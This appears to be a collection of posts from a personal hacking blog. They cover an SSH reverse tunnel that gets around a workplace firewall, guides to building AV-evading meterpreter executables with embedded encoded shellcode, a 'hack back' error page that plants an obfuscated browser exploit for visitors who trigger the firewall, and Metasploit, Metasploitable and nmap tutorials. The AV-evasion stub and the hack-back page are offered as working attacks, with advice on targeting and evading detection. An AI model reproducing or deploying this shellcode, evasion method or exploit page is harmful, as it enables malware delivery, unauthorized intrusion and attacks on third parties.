Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises.

So to tithe you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu forums policy to instruct people how to bypass the security of a network they do not own. This however, is my personal blog and I will instruct whatever I want πŸ˜› That being said, if you do this at work and get fired it’s your fault, most sysadmins will frown on this, and yes they will catch you.

This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded).

This requires three systems. The endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to ssh from (presumably your home machine or another system that you control).

Note : For the purposes of this guide the following IP’s are used as a point of reference.

Middleman : 192.168.0.15
Endpoint Behind Firewall : 172.16.128.4
Machine that you’re SSH’ing from : 192.168.0.14

So here we go.

Setting up the Middle Man

First things first, we need to install to install an openssh-server on our middleman and configure it as a gateway.

Note : This is done on Ubuntu, change commands appropriately for your operating environment.

sudo apt-get install openssh-server

Now we want to edit /etc/ssh/sshd_config and add the following lines.

GatewayPorts Yes
TCPKeepAlive Yes

This will keep our connections alive and allow us to tunnel through this system.

Creating a Reverse Connection From the Endpoint

Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here.

ssh -R 31337:localhost:22 dangertux@192.168.0.15

What this does is create a reverse connection and tunnel to 192.168.0.15

Connect From Your Machine

Now we connect to the middleman server from our machine.

ssh -p 31337 dangertux@192.168.0.15

Note: the password you are prompted for will be the password of the user on the machine behind the firewall.

There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning, a sysop will not take DT told me to as an excuse, besides I didn’t tell you to, I told you how πŸ˜‰

Advertisements

In a previous article I discussed using SET and shellcodeexec to create basic backdoored executable files with the meterpreter reverse shell to bypass Anti-Virus on Windows. I have received several comments and emails regarding this method not working for individuals despite it being undetectable by AV. I will now show you another method of creating a custom EXE stub to bypass AV.

It’s important to note that once you run this in Virus total it’s going to get detected, so you need to randomize your EXE stub template as much as possible. Also use this on high value targets only as each payload will have maybe a 24-48 hour lifespan on a production network before AV is picking it up.

Please Note : This is not my creation, this concept has been discussed and demonstrated about a million times by people far more intelligent than myself. So if you feel like I’m stealing your idea, I’m sorry it was a good idea πŸ˜›

Creating The Executable Skeleton

We’ll create a basic framework for our executable here this will be a simple C skeleton it will look like this.


#include
//make sure you modify this skeleton padding payload
etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

We will call this meterpreter.c for giggles.

Generating our Payload

First thing we'll do is generate our payload and encode it. Remember encoding does little in terms of AV, it gives us some benefit, however it will do more for us in terms of bypassing IDS.

 

 

 

 

After this place our payload in our meterpreter.c file and it should look like so...


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Insert Random Padding

Now that we've gotten our payload inserted, let's place our random padding in. You can do this through any method. I like to do the following

cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c512 > /root/random

Change the regex on tr to whatever you need and change the count on head to as many characters as you want to use to pad.


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
"cb1BB4YuXguEasx-EPPgGW9XCbgNzUub8pMFMo8IJJrgdHvKE_ywAaXhIT9ZCQ7nkwEsfyP0qRIADUORefB1y9uV0WfxJH0FWkP9y2QD3hZfYDBzcLP-sbHrdzeb9nOlhht5mj5uYsLfv2-wsXIyJ6uXWc-mQyVxyU2TULTF10I4-c545F1EVU1D_paZXshUOYAi6kpDSLIkrfj_xZW-oeqWlcoEQuBE2ZkMnTm7zHoPrpy0qt9Ikgq-p3eGS1sWz4O7D17ujwjB-i9MVk2R6J13vaa0KQ0AN_PxPT6mMbChi82FjgbNuVfHUtfH6n1Om7oHdrDCaBxxZnSYl4VutSY16K0gfpioZtLC98uj3JqQCbA7BUd7L2bEWlmJV-O1erv6bUx_YtxB6RJNdN5eTdsd3Ansd0xx_sCGZMXOtFG4VhWeOODQ8zWY5vgmobrBeaCO_HAUyvpzy81VDaYX5sHoYo8dagKhGPp4GjfaLpPRliynosv0vAHsdp3icE2X"
;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Compile it

Now we simply compile it for Windows

/usr/bin/i686-mingw32msvc-gcc -Wall meterpreter.c -o meterpreter.exe

You'll probably get some warnings.

Now verify your shell

 

 

 

 

And check it on virus total. Report here

You should come up with less than 20% detection rate, with none of the major AV picking it up. If you're coming up higher than that you can add to your executable stub, and or try payloading an actual EXE template (don't do notepad.exe everyone does notepad). Also changing your payload for custom shellcode will give you a 0% detection rate most of the time.

If you're still getting picked up by AV you can try some hacks in

/opt/framework/msf3/lib/msf/core/exploit/exe.rb

I would suggest checking out this bit of code.

                # Copy the code to a new RWX segment to allow for self-modifying encoders
                payload = win32_rwx_exec(code)

Since most AV will trigger on the RWX push in the encoder. Modifying this and creating a custom encoder should allow you to bypass all current AV signatures. Note, that's a theory I haven't had to test it.

So... Yeah I'm not writing about Windows for a while anymore hope you guys enjoyed it πŸ˜‰

WHAT!!!! WINDOWS!??!?!?! NO WAY DT!!! Yes way guys… Just this once, plus you can use this trick for Linux payloads too if you make a few changes to a python script πŸ˜‰

Note : I know you can use shellcodeexec to execute payloads without SET, however SET automates the process quite nicely for you and it makes a nice addition to the Silly SET Tricks article collection. So please don’t fill up my comments box telling me I’m a moron, thank you πŸ™‚

I actually wrote this because a good friend of mine Dan Dieterle over at Cyber Arms sent me an email regarding bypassing Windows AV with meterpreter. Windows AV is a lot tougher to tip toe around than Linux AV (because Linux AV sucks) so for all you nix guys you’re gonna have to sit this one out and go read one of the many things I’ve written about Linux in the past few weeks.

Creating our Payload with SET

First things first make sure SET is updated and you have it fired up. This is essentially going to be a set of Screen caps, not so much an article.

Choose 1 for Social Engineering Attacks

Choose 4 for Create Payload and Listener

Choose 13 For Shellcodeexec

Then configure the port of your listener and payload settings however you wish…

Configure payload as you see fit.

You can then set up the listener now , or start it later with Metasploit – just remember to set the options you set earlier in SET for the payload for multi/handler πŸ˜‰

Note : don’t be an idiot like me, make sure your path is correct for UPX (although it won’t effect the outcome here).

Set up Payload

Your payload will be stored in the root directory of SET (/pentest/exploits/set on Back Track 5). We can go ahead and change our filename and make it executable (not needed for Windows Binaries)

mv /pentest/exploits/set/msf.exe  ~/badbadfile.exe

Then just get it onto the target system πŸ˜‰

Confirm that it will bypass AV

Run it against virus-total and we’ll see surprisingly happy results πŸ™‚

Virustotal report

Enjoy

Note : Depending on the location this could be considered illegal, do not do this unless you’re sure it’s acceptable under law. I am not responsible for what you do with this information I just thought this would be a fun article to write. No Skiddies were harmed in the making of this travesty.

So I’ve been asked many times, what about offensive security measures for my server or web application. Is it possible to own an attacker back. The answer is quite simply put yes, and we are going to analyze an example of how that would be done. Why? Not sure – I’m feeling pretty awesome today so I decided we’d get a little creative. (I’m out of that slump guys ;-))

The closer I get to you the more I hurt you. –Shinji Ikari

Caveats

This works best (only) if the attacker is using a vulnerable browser to perform inline attacks such as SQL injection. This will do nothing in terms of automated tools.

This is probably illegal to actually do.

This is a pain in the butt to pull off. (But it’s fun!)

Your web application firewall better not EVER spit out false positives, otherwise you may find yourself with a LOT of shells very quickly lol.

Preparing the β€œCounter” Attack

First step, assuming we have a web application firewall like mod-security that spits out 501 Not Implemented when someone tries to do bad things like SQLi, we need to create a custom error page for 501.

Create .htaccess

In the directory for the website that you want protected by our β€œoffensive” security solution we will create the following .htaccess file.

ErrorDocument 501 /var/www/badbadbad.html

After we restart our Apache server anyone receiving a 501 error will be sent to this file, which we have yet to create. What oh what shall we put in that file… πŸ™‚

Enter the Browser Exploit

The next step in this attack is to create a browser exploit that will compromise the attacker when they reach the 501 page via SQL injection, or some other web nasty.

Targeting the Browser

We can clearly see in our Apache logs that the following individual is attempting to perform SQLi

192.168.0.4 - - [08/Dec/2011:03:56:26 -0500] "GET /index.php?id=-1'%20AND%201=1;-- HTTP/1.1" 501 28098 "dangertux.no-ip.org "Mozilla/3.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20100905 Fedora 15 (Lovelock) Firefox/3.5

Thankfully we have quite a bit of information from their browser header. And we know they are running Firefox 3.5 on Fedora Linux.

On top of it these would be penetrators (I love that word) are in fact using a rather vulnerable browser πŸ˜‰

So now that we know what browser the attacker is using we can find or create code that will exploit a vulnerability in it and give us code execution.

Creating the Exploit…I Mean…The Error Page

Now our next step is to package the exploit code on the error page we created. Below are the contents of our file badbadbad.html

<HTML>
<HEAD>
<TITLE>SQL Injection is NOT supported here.</TITLE>
</HEAD>
<BODY>
<H1>Error 501</H1>
<H3>The following method is not implemented but thank you for the shell <3</H3>
<b><i>~ Happy Holidays ~ </b></i>
<iframe height=”0” width=”0”>
<script language="JavaScript">var wMAdopNhHKNGsLurezAVSWb=unescape;var aATwpEbpReJ=wMAdopNhHKNGsLurezAVSWb("%u7e98%u993f%u49a8%uf618%uebd1%u9f3c%u249b%u347a%u7177%u7b7f%ub415%u27b6%u8567%u3dfc%u9f97%u787c%uf921%ud387%u3ae2%u32eb%ubed6%u4346%u0c72%u912f
*** SNIP ***  (the rest of the obfuscated exploit code goes here: If you don't know how to do that you shouldn't be doing this)
</script>
</iframe>
</BODY>
</HTML>

Now simply restart your web server and let the good times roll πŸ™‚

The Attack

Once the attacker attempts their attack and it fails they are now presented with the 501 page we created that contains our browser exploit.

What the 'attacker' sees

Once they make it this far we are victorious πŸ™‚

What it feels like to win πŸ˜‰

There you go – a hack back snack pack for all of those hosting their own blogs πŸ˜›

Remember I am 99% sure it’s illegal to actually do this

It occured to me that there may be some individuals using Ubuntu Linux that want to follow along with the Metasploitable Guide, or just otherwise have the Metasploit Framework without using Back Track for it. So here is a quick run down on installing and configuring Metasploit Framework on Ubuntu 12.04 LTS, with a PostgreSQL backend. This should work on other versions of Ubuntu as well. The advantage of using 12.04 though, is that the ruby libraries from the repos are a bit newer, and you will get slightly better performance out of Metasploit Framework by using them.

Satisfying Dependencies

First we must satisfy all the Metasploit Framework Dependencies.

sudo apt-get update && sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libpq-dev libpq5 libreadline-ruby irb ri rubygems subversion build-essential ruby-dev libpcap-dev postgresql-8.4 nmap

Installing the Postgres Ruby Gem

Next we need to install the pgSQL Ruby gem.

sudo gem install pg

Installing Metasploit Framework

Next we need to install the Metasploit Framework itself, we will be using subversion to do so. It is also used to update the framework, though now you can also get the latest snapshots via Git.

sudo mkdir /opt/framework3
cd  /opt/framework3
sudo svn co https://www.metasploit.com/svn/framework3/trunk/ msf

Configuring Extensions

Next to configure raw socket and wifi extension.

Raw Socket Extension

cd /opt/framework3/msf/external/pcaprub
sudo ruby extconf.rb
sudo make && sudo make installing

Wireless Extension

cd /opt/framework3/msf/external/ruby-lorcon2
sudo svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
cd lorcon2
sudo ./configure --prefix=/usr && sudo make && sudo make install
cd ..
sudo ruby extconf.rb
sudo make && sudo make install

Add Metasploit To Path

sudo ln -sf /opt/framework3/msf/msf* /usr/local/bin

Configuring Database Back-End

Create the new database user

sudo -s
su postgres
createuser msf -P

Create a password and answer the following questions appropriately (n is a safe default).

Create Database

create db –owner=msf msf

Running Metasploit Framework and Connecting to Your DB Backend

To start Metasploit Framework do the following

sudo msfconsole

Connecting To your Database

To connect to our database from Metasploit framework console we’ll do the following.

db_driver postgresql
db_connect msf:msf@127.0.0.1:5432/msf

Note : You can also add these to your /opt/framework/msf/msfconsole.rc file and the database will connect at run time.

where msf:msf is the username:password 127.0.0.1 is the host running PGSQL and msf is the database name.

Hope this was helpful.

P.S : I’m still in a creative slump so I know this was a cop-out sorry guys lol πŸ˜›

So here is the final chapter in the Metasploitable Guide. I was originally intending this to be a 10 part guide, but frankly if I don’t finish it today, it’s never going to get done. Ubuntu 12.04 is in Alpha stage and I’d like to spend some time putting together half decent server and desktop security guides for the new LTS, as such this needs to end here. If you’re just finding this guide and would like to start from the beginning links to the other chapters of the guide can be found here.

Scanning for additional local vulnerabilities with Nessus Bridge

This is just something amusing we can do, in an actual environment where this system is sitting on a network with an IDS/IPS this probably isn’t the best idea as Nessus makes a huge amount of noise. That being said, the Nessus bridge is a fun plugin for Metasploit, so I figured I’d hit it up for the sake of illustrating its functionality, there is also a similar plugin module for OpenVAS if that is your preffered vulnerability scanner.

Configuring A Nessus Policy

The first step to doing this is to make sure we have a preconfigured Nessus policy you can use a pre-existing policy if you’d like however, since we know pretty much everything about this host at this stage of the game it makes more sense to fine tune a policy in order to reduce the time it takes to perform the audit, and decrease the chances of being discovered by any IDS (if there were one).

Using Nessus Bridge In Metasploit

After we’ve started the Nessus daemon, and configured our scan policy we can execute the scan against our target directly in Metasploit by doing the following.

load nessus
nessus_connect root:toor@localhost:8834
nessus_scan_new -5 Metasploitable 192.168.0.7

Where root:toor is the username password for your nessus user and -5 is the policy number you want to use Metasploitable is the name of the scan and 192.168.0.7 is the target.

Nessus Report

After our Nessus scan is complete we will see that there are quite a few additional vulnerabilities in this system, we do not obviously have to exploit all of them if we do not want to. However, if this were a real world situation we would want to at least verify that they are all legitimate and not false positives due to backports.

In this report we find this advisory particularly interesting: CVE-2009-1185

Local Escalation through Udev

A quick search for this CVE yields us code that will allow escalation to root privileges : That source code is here.

Rooting Metasploitable…Again

Now — we already have root privileges however, what if we didn’t what if the only method we had for gaining entry to the server was weak ssh user credentials

We’re going to utilize the public exploit code for the udev escalation in conjunction with our previosuly obtained credentials for user to gain a root shell on our target.

Creating our Payload

First step here is to create our payload — we’ll use Metasploit to create a simple reverse shell and listener.

The next step is to use SCP to upload our exploit and payload to the target using our stolen credentials , user:user.

Once we have uploaded our exploit and payload we can open an ssh session to the victim, cd into /tmp, compile our exploit run it…

 

..and win πŸ˜‰

That’s all folks — that brings our Metasploitable Guide to an end, there are a ton of other things you can do with this vulnerable Virtual Machine, however that should be more than enough pwnage to inspire you and keep you motivated to try new and exciting things.

Hopefully it was a learning experience and you enjoyed it greatly, I had a good time writing it πŸ™‚

Using Nmap Effectively

Posted: December 1, 2011 in Guides
Tags: ,

A very good friend of mine wrote an article on his blog today about the anatomy of ownage, well not really the title was actually Hacking Introduction and it was a wonderful read. He’s embarking on a difficult journey and seeking a very illustrious certification in the Information Security industry. You should definitely read his article (and the rest of his blog for that matter) if you are interested in learning along with him. In the spirit of his article (hopefully I’m not stepping on his toes) I want to discuss one of the most vital tools used to profile a network, or service on the network. That tool is nmap — yeah I know you know how to use it you just fire up one of these…

nmap -v -A pwnedsite.com

And you’re ready to roll right? Well — no, not really. Nmap like Wireshark is one of those tools that gets thrown around the Ubuntu community a lot, and truthfully many people really don’t know how to use either of them effectively. This is a late night wednesday post, so this by no means is going to be a comprehensive guide to nmap, as it is probably one of the best security auditing tools available. I’ve seen entire 500+ page manuals written on using nmap that don’t cover all the nifty stuff you can do with it. However, I’m going to toss out a few tips that I like to use to profile systems, services and networks more effectively.

Note : I’m lazy, I didn’t have a Ubuntu system handy so I’m using a Back Track 5 install here because it had nmap. All of this will work just fine with Ubuntu using a standard version of nmap, you may however have to prepend sudo to some of these commands for them to work properly.

Another Note : For this entire guide I will be using the 192.168.0.0 network — just so you know for a frame of reference.

Network Discovery

The first tip I want to discuss is a quick way to get a good picture of what is running on a network without making IDS/IPS go crazy and without taking a million years to do it. There are two quick ways I like to do this; these are especially effective when scanning a larger network, as it can take hours if you get too tricky with your options (that -A option that everyone likes to throw on there). It’s important to understand that these two methods aren’t going to give you a whole lot of information about the network — they are however going to tell you what hosts are up, and one of them will give you a rough guestimate of what services are running on the network.

The Ping Sweep

This is fast, very fast, it doesn’t give you much information other than if a host is up or not; but this is a great way to start determining the network structure and laying out the pieces of where everything goes. If you’re trying this on your home network like I am, you may find a lot of firewalls will eat this scan alive. This is because this utilizes an ICMP echo request to determine if the host is alive or not. This is obviously not the most conclusive method, but as I said on a normal network (that isn’t blocking echo requests) this should give you a decent idea of where what is.

This scan is performed by doing the following.

nmap -sP 192.168.0.0/24

As you can see this doesn’t give us much information as to what hosts are running. However I told you it was fast πŸ˜‰

Fast Connect Scan

This scan utilizes the TCP connect() method. Basically what that means is it will attempt to create a valid TCP handshake with a service. This connection is like any other connection that is created legitimately. This scan is not as fast as the TCP SYN Scan that we will talk about in a little bit, however this is often very useful for fast profiling that can bypass IDS/IPS and SPI firewalls. It is important to note here however, that since a connection is created this scan may appear in log files of the scanned machine.

This scan is invoked as such.

nmap -sT 192.168.0.0/24

Fast SYN Scan

Alternatively we can do a SYN scan, this is also known as half-open scanning. Meaning a handshake is never completed, because the subsequent TCP RST packet that nmap sends must be forged, this requires privileged access so will be run with the sudo command. This scan can and will often get shot down by firewalls, however it is VERY quiet in logs. An SPI firewall however, WILL slow this scan down considerably. Also important to note is that this will not identify services running on UDP ports.

This scan is invoked as such.

sudo nmap -sS 192.168.0.0/24

Profiling a System or Device

Now that we have a good idea of the layout of our network, and we see that we have a variety of interesting services to investigate let’s look at some options we have for profiling an individual system. As we can see from our intitial scans 192.168.0.7 looks like it has a lot going on (bonus points if you can tell me what the VM is ;-)). So let’s take a look at that system.

Obtaining Versioning Information

This is probably one of the most useful features in nmap, it can give you a quick and rather accurate portrait of what versions of a service or piece of software a system is running with little to no information ending up in the system’s log files. For this we’re going to compound our SYN scan with a version detection script.

This scan will be invoked as such.

sudo nmap -T4 -v -sS -sV 192.168.0.7

Note : I did some interesting stuff here -sS is our SYN Scan -sV is our service scan the -v option increases the verbosity of our output and -T4 increases our timing from the default 3, this speeds up the scan, alternatively you can slow down the scan by doing -T2 , 1 being the slowest 5 being breakneck fast.

As you can see we’ve obtained quite a bit of information about this system from this scan, and there are a number of vulnerable services. By the way the bonus points go to whoever said metasploitable πŸ˜›

Obtaining Operating System Information

OS Fingerprinting is another valuable function that nmap provides — we’ll take the same scan and add a little bit to it to perform this type of scan we’ll do the following.

sudo nmap -T4 -v -sS -sV -O 192.168.0.7

Note : If this fails on your target system you may wish to set the no ping option (-PN).

As you can see this time we’re given a little bit more information about our target’s Operating environment. We know it’s running some version of linux 2.6.x — this can be useful.

Profiling an Individual Service

Now that we’ve gotten a good picture of our overall system let’s take a look at an individual service on the system.

The Nmap Scripting Engine

If you noticed in the previous screen captures nmap was saying it loaded 9 scripts for scanning. Nmap has an extremely powerful scripting engine that allows us to create LUA scripts to use it to scan for pretty much anything we’d like. (these are stored in /usr/local/share/nmap/scripts). So let’s use the nmap scripting engine to take a better look at samba and see what’s going on there since it looks like it might be in a default configuration.

This scan will be invoked as such

sudo nmap -T4 -v -sS -sV -O --script smb-enum-users,smb-enum-shares 192.168.0.7

As you can see the power of NSE is amazing, we’re presented with a list of corresponding users and shares for the samba service. There are many useful scripts that come pre-loaded with nmap check them out for yourself, also it is extremely easy to write your own LUA scripts to scan for anything you want to.

Profiling a Hardened Target

Occasionally sysadmins will try to be a little bit clever and try to throw together some nifty iptables rules to delay, slow down or otherwise confuse nmap. It will usually look something like this.

